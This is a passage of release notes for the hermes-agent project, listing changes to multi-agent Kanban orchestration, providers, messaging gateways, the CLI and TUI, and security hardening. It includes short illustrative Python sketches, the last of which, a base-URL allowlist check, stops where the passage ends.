## 🎛️ Kanban — Multi-Agent Maturation Wave
### Orchestration & dispatch
- Orchestrator-driven auto-decomposition on triage. ([#27572](https://github.com/NousResearch/hermes-agent/pull/27572))
- Kanban swarm topology helper — `hermes kanban swarm` creates a Swarm v1 graph (root + parallel workers + gated verifier + gated synthesizer + shared blackboard). (salvages [#26791](https://github.com/NousResearch/hermes-agent/pull/26791) by @Niraven) ([#28443](https://github.com/NousResearch/hermes-agent/pull/28443))
- Dispatcher wires review agents from the review column. ([#28449](https://github.com/NousResearch/hermes-agent/pull/28449))
- Stale-detection for running tasks in dispatcher. ([#28452](https://github.com/NousResearch/hermes-agent/pull/28452))
- Respawn guard blocks repeat worker storms. ([#28455](https://github.com/NousResearch/hermes-agent/pull/28455))
- Respawn guard defers `blocker_auth` instead of auto-blocking. ([#28683](https://github.com/NousResearch/hermes-agent/pull/28683))
- Cross-profile cron jobs surface in dashboard. ([#28457](https://github.com/NousResearch/hermes-agent/pull/28457))
- Worker visibility endpoints: `/workers/active`, `/runs/{id}`, `/inspect`. (salvages [#23761](https://github.com/NousResearch/hermes-agent/pull/23761) by @Interstellar-code) ([#28432](https://github.com/NousResearch/hermes-agent/pull/28432))
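
The Swarm v1 shape named above (root, parallel workers, gated verifier, gated synthesizer) can be modelled as a small dependency graph. The edges below are an assumption about what "gated" means here: the verifier waits for every worker, and the synthesizer waits for the verifier. The function names are hypothetical and the shared blackboard is omitted.

```python
from typing import Dict, List, Sequence, Set


def build_swarm_graph(root: str, workers: Sequence[str]) -> Dict[str, List[str]]:
    """Map each task to the tasks it depends on."""
    graph: Dict[str, List[str]] = {root: []}
    for worker in workers:
        graph[worker] = [root]           # workers fan out from the root
    graph["verifier"] = list(workers)    # gated on all workers
    graph["synthesizer"] = ["verifier"]  # gated on the verifier
    return graph


def ready_tasks(graph: Dict[str, List[str]], done: Set[str]) -> List[str]:
    """Tasks not yet done whose dependencies have all completed."""
    return [
        task
        for task, deps in graph.items()
        if task not in done and all(dep in done for dep in deps)
    ]
```

Calling `ready_tasks` after each completion shows the gating: the workers become ready together once the root finishes, and the verifier only after the last worker is done.
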
### Task configuration & scheduling
- Per-task model override. ([#28364](https://github.com/NousResearch/hermes-agent/pull/28364))
- Board-level default workdir. ([#28394](https://github.com/NousResearch/hermes-agent/pull/28394))
- Configurable worktree paths and branches. ([#28462](https://github.com/NousResearch/hermes-agent/pull/28462))
- Scheduled task start times. ([#28384](https://github.com/NousResearch/hermes-agent/pull/28384))
- Scheduled status for delayed follow-ups. ([#28467](https://github.com/NousResearch/hermes-agent/pull/28467))
- Trimmed task comments. ([#28399](https://github.com/NousResearch/hermes-agent/pull/28399))
- Initial-status for human-ops cards. ([#28414](https://github.com/NousResearch/hermes-agent/pull/28414))
- `max_in_progress` config to cap concurrent running tasks. ([#28420](https://github.com/NousResearch/hermes-agent/pull/28420))
- Filter tasks by workflow fields. ([#28454](https://github.com/NousResearch/hermes-agent/pull/28454))
- `--sort` for `hermes kanban list`. ([#28427](https://github.com/NousResearch/hermes-agent/pull/28427))
- Optional `board` parameter on all MCP tools. ([#28444](https://github.com/NousResearch/hermes-agent/pull/28444))
- Stamp originating ACP session_id on tasks. ([#28447](https://github.com/NousResearch/hermes-agent/pull/28447))
- `auto_promote_children` config toggle. ([#28344](https://github.com/NousResearch/hermes-agent/pull/28344))
- `archive --rm` to hard-delete archived tasks. ([#28355](https://github.com/NousResearch/hermes-agent/pull/28355))
- Promote dependents when parent is archived. ([#28372](https://github.com/NousResearch/hermes-agent/pull/28372))
- Promote blocked tasks when parent dependencies complete. ([#28377](https://github.com/NousResearch/hermes-agent/pull/28377))
- Demote ready children when parent is reopened. ([#28382](https://github.com/NousResearch/hermes-agent/pull/28382))
- `promote` verb for manual `todo→ready` recovery + bulk `--ids`. (salvage [#29464](https://github.com/NousResearch/hermes-agent/pull/29464)) ([#31334](https://github.com/NousResearch/hermes-agent/pull/31334))
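
The `max_in_progress` cap listed above limits how many tasks run concurrently. A dispatcher tick under such a cap might select work roughly as follows. This is a sketch only: `select_to_spawn` is a hypothetical helper, and treating an unset cap as "no limit" is an assumption.

```python
from typing import List, Optional, Sequence


def select_to_spawn(
    ready: Sequence[str],
    running_count: int,
    max_in_progress: Optional[int],
) -> List[str]:
    """Return the ready tasks that fit in the remaining capacity, in order."""
    if max_in_progress is None:
        return list(ready)  # assumed: no cap configured means no limit
    free_slots = max(0, max_in_progress - running_count)
    return list(ready)[:free_slots]
```

Tasks left out of the returned list stay in `ready` and are reconsidered on the next tick.
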
### Dashboard
- Drag-to-delete trash zone + bulk delete. ([#28468](https://github.com/NousResearch/hermes-agent/pull/28468))
- Surface per-task `model_override` in show + tool output. ([#28442](https://github.com/NousResearch/hermes-agent/pull/28442))
- Cross-profile notification delivery via `kanban.notification_sources`. ([#28395](https://github.com/NousResearch/hermes-agent/pull/28395))
- Scratch-workspace deletion warning for users. ([#30949](https://github.com/NousResearch/hermes-agent/pull/30949))
- Mobile dashboard UX polish. ([#28127](https://github.com/NousResearch/hermes-agent/pull/28127))
### Reliability
- Worker log retention configurable. ([#27867](https://github.com/NousResearch/hermes-agent/pull/27867))
- Configurable claim TTL. ([#28392](https://github.com/NousResearch/hermes-agent/pull/28392))
- Fingerprint crash errors to prevent fleet-wide retry exhaustion. ([#28380](https://github.com/NousResearch/hermes-agent/pull/28380))
- Reset failure counters on `unblock_task`. ([#28379](https://github.com/NousResearch/hermes-agent/pull/28379))
- Detect cycles in `decompose_triage_task` sibling-link pre-validation. ([#28088](https://github.com/NousResearch/hermes-agent/pull/28088))
- Surface unusable triage auxiliary model (auto-decompose aware). ([#27871](https://github.com/NousResearch/hermes-agent/pull/27871))
- Align failure diagnostics with retry limit. ([#27868](https://github.com/NousResearch/hermes-agent/pull/27868))
- Align worker terminal timeout with task runtime. ([#27864](https://github.com/NousResearch/hermes-agent/pull/27864))
- Auto-install bundled skills (kanban-worker) on init. ([#28368](https://github.com/NousResearch/hermes-agent/pull/28368))
- Make legacy task migration idempotent. ([#28397](https://github.com/NousResearch/hermes-agent/pull/28397))
- Serialize DB initialization. ([#28383](https://github.com/NousResearch/hermes-agent/pull/28383))
- Persist worker session metadata on completion. ([#28387](https://github.com/NousResearch/hermes-agent/pull/28387))
- Pass `accept-hooks` to worker chat subprocess. ([#28393](https://github.com/NousResearch/hermes-agent/pull/28393))
- Preserve worker tools with restricted toolsets. ([#28396](https://github.com/NousResearch/hermes-agent/pull/28396))
- Avoid unsafe Windows worker Hermes shim resolution. ([#28398](https://github.com/NousResearch/hermes-agent/pull/28398))
- Sync slash subcommands with live parser. ([#28376](https://github.com/NousResearch/hermes-agent/pull/28376))
- Show scheduled kanban tasks in dashboard. ([#28400](https://github.com/NousResearch/hermes-agent/pull/28400))
- Assign single-task kanban decompositions. ([#28401](https://github.com/NousResearch/hermes-agent/pull/28401))
- Configurable `max_tokens` for kanban specify. ([#28374](https://github.com/NousResearch/hermes-agent/pull/28374))
- Per-job profile support for cron. ([#28124](https://github.com/NousResearch/hermes-agent/pull/28124))
- Codex app-server: include every Kanban-pinned path in `writable_roots`. ([#28435](https://github.com/NousResearch/hermes-agent/pull/28435))
- Cache kanban worker guidance at session init for prompt-cache reuse. ([#28425](https://github.com/NousResearch/hermes-agent/pull/28425))
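
Cycle detection in sibling links, as in the `decompose_triage_task` pre-validation item above, is commonly done with a depth-first search that tracks nodes on the current path. The sketch below shows that general technique and is not the code from #28088; the `links` mapping shape is an assumption.

```python
from typing import Dict, List

WHITE, GRAY, BLACK = 0, 1, 2  # unvisited, on the current path, fully explored


def has_cycle(links: Dict[str, List[str]]) -> bool:
    """Return True if the directed graph task -> linked tasks contains a cycle."""
    color: Dict[str, int] = {}

    def visit(node: str) -> bool:
        color[node] = GRAY
        for nxt in links.get(node, []):
            state = color.get(nxt, WHITE)
            if state == GRAY:  # back edge: nxt is already on the current path
                return True
            if state == WHITE and visit(nxt):
                return True
        color[node] = BLACK
        return False

    return any(color.get(n, WHITE) == WHITE and visit(n) for n in list(links))
```
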
---
## ⚡ Performance
- `openai._base_client` import deferred — 240ms / 17MB off every CLI cold start. ([#28864](https://github.com/NousResearch/hermes-agent/pull/28864))
- Agent-loop hot-path optimizations — 47% fewer per-conversation function calls (399k → 213k for 31-turn chat). ([#28866](https://github.com/NousResearch/hermes-agent/pull/28866))
- Compression-feasibility check deferred — 170-290ms off every agent construction. ([#28957](https://github.com/NousResearch/hermes-agent/pull/28957))
- Adaptive subprocess poll — ~195ms off every tool call, 1+ second per turn. ([#29006](https://github.com/NousResearch/hermes-agent/pull/29006))
- Termux TUI cold start speedup. ([#29419](https://github.com/NousResearch/hermes-agent/pull/29419))
- Termux non-TUI cold start speedup. (salvage [#29438](https://github.com/NousResearch/hermes-agent/pull/29438)) ([#30121](https://github.com/NousResearch/hermes-agent/pull/30121))
- Termux fast-path version + deferred bare-prompt agent startup. ([#30609](https://github.com/NousResearch/hermes-agent/pull/30609))
- Cut `hermes --version` wall time by 63%, flipping the head-to-head comparison with Codex CLI. ([#31968](https://github.com/NousResearch/hermes-agent/pull/31968))
- Date-only timestamp + loud gateway-DB roundtrip logging — improves prompt-cache hit rate. ([#27675](https://github.com/NousResearch/hermes-agent/pull/27675))
- Cache kanban worker guidance at session init for prompt-cache reuse. ([#28425](https://github.com/NousResearch/hermes-agent/pull/28425))
---
## 🔧 Tool System
### Tool surface
- `patch`: indent preservation, CRLF preservation, per-file failure escalation. ([#32273](https://github.com/NousResearch/hermes-agent/pull/32273))
- `terminal`: warn at call time when `background=true` runs silently. ([#31289](https://github.com/NousResearch/hermes-agent/pull/31289))
- `terminal`: nudge homebrewed CI pollers at the tool surface. ([#33142](https://github.com/NousResearch/hermes-agent/pull/33142))
- `x_search`: surface degraded results + validate dates. ([#29484](https://github.com/NousResearch/hermes-agent/pull/29484))
- `x_search`: auto-enable toolset when xAI credentials are configured. ([#27376](https://github.com/NousResearch/hermes-agent/pull/27376))
- `computer_use`: route SOM/vision captures via `auxiliary.vision`. ([#30126](https://github.com/NousResearch/hermes-agent/pull/30126))
- `transcription`: reject symlinked audio inputs. ([#10082](https://github.com/NousResearch/hermes-agent/pull/10082))
- TTS: prevent double `[pause]` in xAI auto speech tags. ([#32237](https://github.com/NousResearch/hermes-agent/pull/32237))
- TTS: preserve native audio outside Telegram voice delivery. ([#28512](https://github.com/NousResearch/hermes-agent/pull/28512))
- TTS: opt-in xAI `auto_speech_tags` speech-tag pauses for natural voice replies. ([#29376](https://github.com/NousResearch/hermes-agent/pull/29376))
- Voice: chunk oversized CLI recordings. ([#30044](https://github.com/NousResearch/hermes-agent/pull/30044))
- Voice: honor `PULSE_SERVER` / `PIPEWIRE_REMOTE` inside Docker. ([#22534](https://github.com/NousResearch/hermes-agent/pull/22534))
### Browser
- All cloud browser providers (Browserbase, Anchor, Camofox, Hyperbrowser, etc.) migrated to image_gen-style plugins. (salvages [#25580](https://github.com/NousResearch/hermes-agent/pull/25580)) ([#27403](https://github.com/NousResearch/hermes-agent/pull/27403))
- Auto-launch Chromium-family browser for CDP. ([#29106](https://github.com/NousResearch/hermes-agent/pull/29106))
- Docker: discover agent-browser Chromium binary at boot. ([#33184](https://github.com/NousResearch/hermes-agent/pull/33184))
### Image generation
- **Krea** provider plugin (Krea 2 Medium + Large). ([#33236](https://github.com/NousResearch/hermes-agent/pull/33236))
- FAL backend ported to `plugins/image_gen/fal`. (salvage [#27966](https://github.com/NousResearch/hermes-agent/pull/27966)) ([#30380](https://github.com/NousResearch/hermes-agent/pull/30380))
- Cache xAI ephemeral URL responses to disk. ([#31759](https://github.com/NousResearch/hermes-agent/pull/31759))
### Web search
- **xAI Web Search** as a provider plugin. ([#29042](https://github.com/NousResearch/hermes-agent/pull/29042))
### MCP
- **Nous-approved MCP catalog** with interactive picker. ([#30870](https://github.com/NousResearch/hermes-agent/pull/30870))
- **TLS client certificate (mTLS) support** for HTTP and SSE MCP servers. ([#33721](https://github.com/NousResearch/hermes-agent/pull/33721))
- Stdin paste-back fallback for headless OAuth flow. ([#32053](https://github.com/NousResearch/hermes-agent/pull/32053))
- `skip` at paste prompt bypasses auth without disabling server. ([#32069](https://github.com/NousResearch/hermes-agent/pull/32069))
- Registry-aware `mcp_` prefix on both ends of round-trip. ([#31700](https://github.com/NousResearch/hermes-agent/pull/31700))
---
## 🧩 Skills Ecosystem
### Skills system
- **Skill bundles** — `/<name>` loads multiple skills. ([#28373](https://github.com/NousResearch/hermes-agent/pull/28373))
- Skills Hub: health checks, freshness badge, and a watchdog cron. ([#32345](https://github.com/NousResearch/hermes-agent/pull/32345))
- Opt-in AST deep diagnostics on skill writes. (salvage of [#30918](https://github.com/NousResearch/hermes-agent/pull/30918)) ([#31198](https://github.com/NousResearch/hermes-agent/pull/31198))
- Bundled/pinned skill protection in background-review prompts. ([#28338](https://github.com/NousResearch/hermes-agent/pull/28338))
- Show user-modified skill names in bundled skill sync summary. ([#28671](https://github.com/NousResearch/hermes-agent/pull/28671))
- Load symlinked skill slash commands. ([#27759](https://github.com/NousResearch/hermes-agent/pull/27759))
- Deduplicate Skills Hub search results by identifier, not name. ([#29490](https://github.com/NousResearch/hermes-agent/pull/29490))
### New skills
- `openhands` — delegate-to-OpenHands orchestration skill (closes [#477](https://github.com/NousResearch/hermes-agent/issues/477)) ([#32261](https://github.com/NousResearch/hermes-agent/pull/32261))
- `code-wiki` — persistent indexed dev wiki (closes [#486](https://github.com/NousResearch/hermes-agent/issues/486)) ([#32240](https://github.com/NousResearch/hermes-agent/pull/32240))
- `web-pentest` — OWASP recipes (closes [#400](https://github.com/NousResearch/hermes-agent/issues/400)) ([#32265](https://github.com/NousResearch/hermes-agent/pull/32265))
- `baoyu-article-illustrator` ([#28287](https://github.com/NousResearch/hermes-agent/pull/28287))
---
## ☁️ Providers
### xAI deep integration
- **xAI Web Search** as a `plugins/web/xai/` provider plugin. ([#29042](https://github.com/NousResearch/hermes-agent/pull/29042))
- **`hermes proxy` xAI upstream** — OpenAI-compatible local proxy backed by xai-oauth. ([#28356](https://github.com/NousResearch/hermes-agent/pull/28356))
- **May 15 model retirement detection + `hermes migrate xai`** for grok-4 / grok-3 / grok-code-fast-1 / grok-imagine-image-pro. ([#29277](https://github.com/NousResearch/hermes-agent/pull/29277))
- **Opt-in `auto_speech_tags`** for natural xAI TTS voice replies. ([#29376](https://github.com/NousResearch/hermes-agent/pull/29376))
- **xai-oauth base_url pinned to x.ai origin** — closes silent credential-leak vector. ([#28952](https://github.com/NousResearch/hermes-agent/pull/28952))
- **OpenAI-style execution guidance** applied to Grok / xai-oauth models. ([#27797](https://github.com/NousResearch/hermes-agent/pull/27797))
- xAI: detect retired May 15 models in doctor/chat startup. ([#29277](https://github.com/NousResearch/hermes-agent/pull/29277))
- xAI: resolve Grok Build context for OAuth. ([#30579](https://github.com/NousResearch/hermes-agent/pull/30579))
- xAI OAuth: tier-gated 403 with API-key fallback. ([#28351](https://github.com/NousResearch/hermes-agent/pull/28351))
- xAI OAuth: PKCE `code_challenge` echo. ([#27560](https://github.com/NousResearch/hermes-agent/pull/27560))
- xAI OAuth: quarantine dead tokens on terminal refresh failure. ([#28116](https://github.com/NousResearch/hermes-agent/pull/28116))
- xAI OAuth: honor `WKE=unauthenticated` disambiguator at both classifier sites. ([#30872](https://github.com/NousResearch/hermes-agent/pull/30872))
- xAI OAuth: accept bare-code manual paste (state=None). (closes [#26923](https://github.com/NousResearch/hermes-agent/issues/26923)) ([#33880](https://github.com/NousResearch/hermes-agent/pull/33880))
- xAI OAuth: fall back to manual paste on loopback timeout. ([#33231](https://github.com/NousResearch/hermes-agent/pull/33231))
- xAI proxy: handle 429 rate-limit responses in proxy retry path. ([#33743](https://github.com/NousResearch/hermes-agent/pull/33743))
### Other providers
- **OpenAI API as a first-class provider** (distinct from Codex runtime). ([#31898](https://github.com/NousResearch/hermes-agent/pull/31898))
- **Microsoft Entra ID** auth for Azure Foundry (with 1M Anthropic-Messages beta preserved on Bearer). (salvages [#27509](https://github.com/NousResearch/hermes-agent/pull/27509), [#27022](https://github.com/NousResearch/hermes-agent/pull/27022)) ([#28101](https://github.com/NousResearch/hermes-agent/pull/28101), [#28084](https://github.com/NousResearch/hermes-agent/pull/28084))
- **OpenRouter** sticky routing — `session_id` passed via `extra_body` so a long-running session keeps landing on the same upstream provider. (@Cybourgeoisie) ([#33939](https://github.com/NousResearch/hermes-agent/pull/33939))
- Nous: JWT token for inference; stop replaying invalid Nous refresh tokens. (@rewbs) ([#27663](https://github.com/NousResearch/hermes-agent/pull/27663))
- Nous Portal: one-shot setup, status CLI, and Nous-included markers. ([#30860](https://github.com/NousResearch/hermes-agent/pull/30860))
- Anthropic adapter: extract 7 helpers from `convert_messages_to_anthropic`. (salvage [#27784](https://github.com/NousResearch/hermes-agent/pull/27784)) ([#30386](https://github.com/NousResearch/hermes-agent/pull/30386))
- Catalog: add `qwen3.7-max` to Alibaba + Alibaba-Coding-Plan model lists. ([#33129](https://github.com/NousResearch/hermes-agent/pull/33129))
- opencode-go: route `qwen3.7-max` via `anthropic_messages`. (@beardthelion) ([#32780](https://github.com/NousResearch/hermes-agent/pull/32780))
- opencode-go: expose Kimi K2 + DeepSeek reasoning controls. ([#30845](https://github.com/NousResearch/hermes-agent/pull/30845))
- Remove Vercel AI Gateway and Vercel Sandbox.
- MiniMax OAuth: refresh short-lived access tokens per request. ([#30619](https://github.com/NousResearch/hermes-agent/pull/30619))
- Codex OAuth: quarantine terminal refresh errors. ([#28118](https://github.com/NousResearch/hermes-agent/pull/28118))
- Codex: drop dead model slugs that HTTP 400 on ChatGPT Pro. ([#33424](https://github.com/NousResearch/hermes-agent/pull/33424))
- Codex: sync `manual:device_code` pool entries on re-auth. ([#33744](https://github.com/NousResearch/hermes-agent/pull/33744))
- MiniMax OAuth: quarantine terminal refresh errors. ([#28119](https://github.com/NousResearch/hermes-agent/pull/28119))
---
## 🔑 Secrets
- **Bitwarden Secrets Manager** integration with lazy `bws` install. ([#30035](https://github.com/NousResearch/hermes-agent/pull/30035))
- Bitwarden: EU Cloud + self-hosted server URL support. ([#31378](https://github.com/NousResearch/hermes-agent/pull/31378))
- Label detected credentials with their source (Bitwarden). ([#30364](https://github.com/NousResearch/hermes-agent/pull/30364))
---
## 📱 Messaging Platforms (Gateway)
### Gateway core
- **Deliverable mode** — agents ship artifacts as native uploads from any platform (Slack/Discord/Telegram/Teams/Email). ([#27813](https://github.com/NousResearch/hermes-agent/pull/27813))
- `hermes send` — pipe any script's output to any messaging platform. (salvage of [#19631](https://github.com/NousResearch/hermes-agent/pull/19631)) ([#27188](https://github.com/NousResearch/hermes-agent/pull/27188))
- Debounce queued text follow-ups during active sessions. (salvage of [#31235](https://github.com/NousResearch/hermes-agent/pull/31235)) ([#31341](https://github.com/NousResearch/hermes-agent/pull/31341))
- Plugin-transformed `final_response` delivered through streaming gate. ([#31433](https://github.com/NousResearch/hermes-agent/pull/31433))
- Refresh cached agent tools on `/reload-mcp`. ([#32815](https://github.com/NousResearch/hermes-agent/pull/32815))
- Harden kanban + provider cleanup races on long-running workloads. ([#29479](https://github.com/NousResearch/hermes-agent/pull/29479))
### New / reorganized adapters
- **ntfy** — 23rd platform, push notifications, plugin shape, zero core edits. (salvages [#30625](https://github.com/NousResearch/hermes-agent/pull/30625) → [#4043](https://github.com/NousResearch/hermes-agent/pull/4043)) ([#30867](https://github.com/NousResearch/hermes-agent/pull/30867))
- **Discord** adapter migrated to bundled plugin. (salvage of [#24356](https://github.com/NousResearch/hermes-agent/pull/24356)) ([#30591](https://github.com/NousResearch/hermes-agent/pull/30591))
- **Mattermost** adapter migrated to bundled plugin. (salvage of [#30916](https://github.com/NousResearch/hermes-agent/pull/30916)) ([#31748](https://github.com/NousResearch/hermes-agent/pull/31748))
### Telegram
- Edit status messages in place instead of appending. (based on [#30141](https://github.com/NousResearch/hermes-agent/pull/30141) by @qike-ms) ([#30864](https://github.com/NousResearch/hermes-agent/pull/30864))
- Skip-STT audio path + 2GB cap via local Bot API server. ([#28541](https://github.com/NousResearch/hermes-agent/pull/28541))
- Route image documents (.png/.jpg/.webp/.gif) through vision pipeline. ([#28519](https://github.com/NousResearch/hermes-agent/pull/28519))
- Route audio file attachments away from STT pipeline. ([#28478](https://github.com/NousResearch/hermes-agent/pull/28478))
- `disable_topic_auto_rename` gateway flag. ([#28523](https://github.com/NousResearch/hermes-agent/pull/28523))
- `ignore_root_dm` config to drop messages without `thread_id`. ([#28536](https://github.com/NousResearch/hermes-agent/pull/28536))
- Chat-scoped auth without sender `user_id`. ([#28525](https://github.com/NousResearch/hermes-agent/pull/28525))
- Fail-closed auth fallback when `TELEGRAM_ALLOWED_USERS` is empty. ([#28494](https://github.com/NousResearch/hermes-agent/pull/28494))
- Roll over tool progress bubbles + scope `audio_file_paths`. ([#28482](https://github.com/NousResearch/hermes-agent/pull/28482))
- Avoid duplicate text after auto-TTS voice replies. ([#28509](https://github.com/NousResearch/hermes-agent/pull/28509))
- Mark final voice reply notify-worthy so Telegram delivers it audibly. ([#28504](https://github.com/NousResearch/hermes-agent/pull/28504))
### Discord
- Recover Windows voice opus decoding. ([#33182](https://github.com/NousResearch/hermes-agent/pull/33182))
- `allow_any_attachment` config to accept arbitrary file types. ([#27245](https://github.com/NousResearch/hermes-agent/pull/27245))
- Transcribe native voice notes. ([#28993](https://github.com/NousResearch/hermes-agent/pull/28993))
- Define UI view classes after lazy install. ([#28817](https://github.com/NousResearch/hermes-agent/pull/28817))
### Signal / Matrix / Feishu / Slack / WeCom
- Signal: `require_mention` filter for group chats. ([#28574](https://github.com/NousResearch/hermes-agent/pull/28574))
- Matrix: warn on clock-skew silent message drops. ([#27330](https://github.com/NousResearch/hermes-agent/pull/27330))
- Matrix E2EE installs full dep set; plugins respect `is_connected`. ([#31688](https://github.com/NousResearch/hermes-agent/pull/31688))
- Feishu: require webhook auth secret + honor config extras. ([#30746](https://github.com/NousResearch/hermes-agent/pull/30746))
- Feishu: enforce auth and chat binding for approval buttons. ([#30744](https://github.com/NousResearch/hermes-agent/pull/30744))
- Slack: socket recovery + Windows restart dedupe. ([#28873](https://github.com/NousResearch/hermes-agent/pull/28873))
- WeCom: safe-parse untrusted XML. ([#32442](https://github.com/NousResearch/hermes-agent/pull/32442))
### DingTalk / Webhooks / Microsoft Graph
- DingTalk: transcribe native voice notes. ([#28993](https://github.com/NousResearch/hermes-agent/pull/28993))
- Webhook: enforce `INSECURE_NO_AUTH` safety rail on dynamic route reloads. ([#30863](https://github.com/NousResearch/hermes-agent/pull/30863))
- Webhook: restrict default toolset capabilities. ([#30745](https://github.com/NousResearch/hermes-agent/pull/30745))
- Microsoft Graph: harden webhook auth requirements. ([#30169](https://github.com/NousResearch/hermes-agent/pull/30169))
---
## 🖥️ CLI & TUI
### CLI
- `/update` slash command in CLI and TUI. ([#23854](https://github.com/NousResearch/hermes-agent/pull/23854))
- Update auto-rollback when post-pull syntax check fails. ([#28669](https://github.com/NousResearch/hermes-agent/pull/28669))
- `--branch` flag for `hermes update`. (@jquesnelle) ([#29591](https://github.com/NousResearch/hermes-agent/pull/29591))
- `/exit --delete` flag to remove session on quit. (salvage of [#17665](https://github.com/NousResearch/hermes-agent/pull/17665)) ([#27101](https://github.com/NousResearch/hermes-agent/pull/27101))
- `▶ N` indicator in status bar for running `/background` tasks. ([#27175](https://github.com/NousResearch/hermes-agent/pull/27175))
- Live background terminal-process count in status bar. ([#32061](https://github.com/NousResearch/hermes-agent/pull/32061))
- Append session recap to `/status` output. (salvage of [#18587](https://github.com/NousResearch/hermes-agent/pull/18587)) ([#27176](https://github.com/NousResearch/hermes-agent/pull/27176))
- Configurable paste-collapse thresholds (TUI + CLI). (salvage [#29723](https://github.com/NousResearch/hermes-agent/pull/29723)) ([#32087](https://github.com/NousResearch/hermes-agent/pull/32087))
- `/resume` accepts position numbers. ([#31709](https://github.com/NousResearch/hermes-agent/pull/31709))
- Bring tool-call display back — verbose mode, specific failure reasons, todo progress. ([#31293](https://github.com/NousResearch/hermes-agent/pull/31293))
- Validate runtime token refresh in Qwen auth status. ([#31196](https://github.com/NousResearch/hermes-agent/pull/31196))
### TUI
- **TUI session orchestrator** — multiple live sessions in one TUI window. (salvages [#27642](https://github.com/NousResearch/hermes-agent/pull/27642)) ([#32980](https://github.com/NousResearch/hermes-agent/pull/32980))
- `mouse_tracking` DEC mode presets. (salvage of [#26681](https://github.com/NousResearch/hermes-agent/pull/26681) by @OutThisLife) ([#30084](https://github.com/NousResearch/hermes-agent/pull/30084))
- Termux scrollback preservation + touch-friendly defaults. ([#28910](https://github.com/NousResearch/hermes-agent/pull/28910))
- Full assistant text in scrollback (no history truncation). ([#28829](https://github.com/NousResearch/hermes-agent/pull/28829))
- Preserve scrollback when branching sessions. ([#30162](https://github.com/NousResearch/hermes-agent/pull/30162))
- Preserve Python dunder identifiers in markdown. ([#28582](https://github.com/NousResearch/hermes-agent/pull/28582))
- Active profile shown in TUI prompt. ([#28581](https://github.com/NousResearch/hermes-agent/pull/28581))
- Improve Charizard completion menu contrast. ([#28346](https://github.com/NousResearch/hermes-agent/pull/28346))
- Stop slash dropdown chopping last char of `/goal`. ([#31311](https://github.com/NousResearch/hermes-agent/pull/31311))
- Clipboard copy on Linux/Wayland. ([#29342](https://github.com/NousResearch/hermes-agent/pull/29342))
- Anchor `splitReasoning` unclosed-tag regex; stop eating last paragraph. ([#29426](https://github.com/NousResearch/hermes-agent/pull/29426))
- Surface verbose tool details. ([#30225](https://github.com/NousResearch/hermes-agent/pull/30225))
- Load Linux skills on Termux + salvage @adybag14-cyber's Termux gates. ([#30166](https://github.com/NousResearch/hermes-agent/pull/30166))
- Handle images with codex app-server. ([#31220](https://github.com/NousResearch/hermes-agent/pull/31220))
- Refresh virtual transcript on viewport resize. ([#31077](https://github.com/NousResearch/hermes-agent/pull/31077))
- Ignore late thinking deltas after completion. ([#31055](https://github.com/NousResearch/hermes-agent/pull/31055))
- Commit composer input bursts immediately. ([#31053](https://github.com/NousResearch/hermes-agent/pull/31053))
- Log parent gateway lifecycle exits. ([#31051](https://github.com/NousResearch/hermes-agent/pull/31051))
- Clear TTS env var on voice off + TTS indicator in status bar. ([#30987](https://github.com/NousResearch/hermes-agent/pull/30987))
- Pass `--expose-gc` as node argv instead of `NODE_OPTIONS`. ([#29998](https://github.com/NousResearch/hermes-agent/pull/29998))
- Align composer cursorLayout with wrap-ansi to kill multiline cursor drift. ([#27489](https://github.com/NousResearch/hermes-agent/pull/27489))
- Harden Terminal.app rendering and color paths. ([#27251](https://github.com/NousResearch/hermes-agent/pull/27251))
- Keep `/goal` verdict out of compact status row. ([#27971](https://github.com/NousResearch/hermes-agent/pull/27971))
- Clamp curses color 8 for 8-color terminals (Docker). ([#30260](https://github.com/NousResearch/hermes-agent/pull/30260))
---
## 🔒 Security & Reliability
### Promptware & memory hardening
- **Promptware defense** — shared threat patterns + memory load-time scan + tool-result delimiters. ([#32269](https://github.com/NousResearch/hermes-agent/pull/32269))
- Expand memory content scanning patterns to parity with skills guard. ([#9151](https://github.com/NousResearch/hermes-agent/pull/9151))
- Harden Skills Guard multi-word prompt patterns. (@YLChen-007) ([#26852](https://github.com/NousResearch/hermes-agent/pull/26852))
- Split cron scanner so skill prose stops false-positiving exfil patterns. ([#32339](https://github.com/NousResearch/hermes-agent/pull/32339))
### File safety
- Protect Hermes control-plane files from prompt injection (`auth.json`, `config.yaml`, `webhook_subscriptions.json`, `mcp-tokens/`). (salvages @PratikRai0101's [#14157](https://github.com/NousResearch/hermes-agent/pull/14157)) ([#30397](https://github.com/NousResearch/hermes-agent/pull/30397))
- Write-deny `<root>/.env` when running under a profile. ([#29687](https://github.com/NousResearch/hermes-agent/pull/29687))
- Defense-in-depth read-deny on credential stores. (salvages [#17659](https://github.com/NousResearch/hermes-agent/pull/17659) + [#8055](https://github.com/NousResearch/hermes-agent/pull/8055)) ([#30721](https://github.com/NousResearch/hermes-agent/pull/30721))
- TTS `output_path` traversal + update ZIP symlink reject. (salvage [#6693](https://github.com/NousResearch/hermes-agent/pull/6693) + [#15881](https://github.com/NousResearch/hermes-agent/pull/15881)) ([#32056](https://github.com/NousResearch/hermes-agent/pull/32056))
- Reject symlinked audio inputs. ([#10082](https://github.com/NousResearch/hermes-agent/pull/10082))
### Credential safety
- Avoid persisting borrowed credential secrets — runtime env-sourced keys no longer leak into `auth.json`. ([#31416](https://github.com/NousResearch/hermes-agent/pull/31416))
- Validate Nous Portal `inference_base_url` against host allowlist. (salvages [#27612](https://github.com/NousResearch/hermes-agent/pull/27612)) ([#30611](https://github.com/NousResearch/hermes-agent/pull/30611))
- Harden API server key placeholder handling. ([#30738](https://github.com/NousResearch/hermes-agent/pull/30738))
- Harden Google Chat OAuth credential persistence. (@Zyrixtrex) ([#24788](https://github.com/NousResearch/hermes-agent/pull/24788))
- xAI OAuth: pin inference `base_url` to x.ai origin. ([#28952](https://github.com/NousResearch/hermes-agent/pull/28952))
- Quarantine dead OAuth tokens on terminal refresh failure (xAI, Codex, MiniMax). ([#28116](https://github.com/NousResearch/hermes-agent/pull/28116), [#28118](https://github.com/NousResearch/hermes-agent/pull/28118), [#28119](https://github.com/NousResearch/hermes-agent/pull/28119))
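
The `base_url` pinning and host-allowlist items above share one idea: refuse to send credentials to an origin that is not explicitly trusted. A minimal sketch of such a check, assuming a hypothetical allowlist and helper name (neither is taken from the Hermes codebase):

```python
from urllib.parse import urlparse

# Hypothetical allowlist for illustration; the real list lives in the project.
ALLOWED_HOSTS = {"x.ai"}


def is_allowed_base_url(url: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only for https URLs whose host is an allowed host or a subdomain of one."""
    parsed = urlparse(url)
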